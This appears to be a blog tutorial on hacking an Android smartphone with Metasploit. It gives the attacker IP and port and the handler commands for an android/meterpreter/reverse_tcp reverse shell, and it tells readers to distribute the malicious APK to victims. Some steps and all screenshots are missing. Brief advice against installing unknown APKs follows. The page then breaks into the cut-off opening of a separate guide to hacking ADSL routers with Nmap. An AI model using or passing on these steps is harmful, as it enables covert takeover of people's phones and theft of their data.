What is android? according to wikipedia: Android is an operating system based on the Linux kernel, and designed primarily for touchscreenmobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices. Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)
Step by Step Hacking Android Smartphone Tutorial using Metasploit:
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.
use exploit/multi/handler –> we will use Metasploit handler set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
set lhost 192.168.8.94 –> attacker IP address set lport 443 –> port to listen the reverse connection exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution ).
6. Short stories the victim (me myself) download the malicious APK's file and install it. After victimopen the application, attacker Metasploit console get something like this:
7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
See the video below if you are not clear about the step by step Hacking Android SmartphoneTutorial using Metasploit above:
1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in thistutorial.
How To Hack ADSL Router Using NMAP Tool Asynchronous digital subscriber line (DSL or ADSL) modem is a device used to connect a computer or router to a telephone line which provides the digital subscriber line service for connectivity to the Internet, which is often called DSL or ADSL broadband. In this guide I will show you show you how to scan IP range for connected ADSL or DSL modem routers and find DSL ADSL router hack remotely. This guide applies to Windows, Linux or Mac, so it doesn’t matter what’s your Operating system is, you can try the same steps from all these operating systems. The term DSL or ADSL modem is technically used to describe a modem which connects to a single computer, through a USB port or is installed in a computer PCI slot. The more common DSL or ADSL router which combines the function of a DSL or ADSL modem and a home router, is a standalone device which can be connected to multiple computers through multiple Ethernet ports or an integral wireless access poi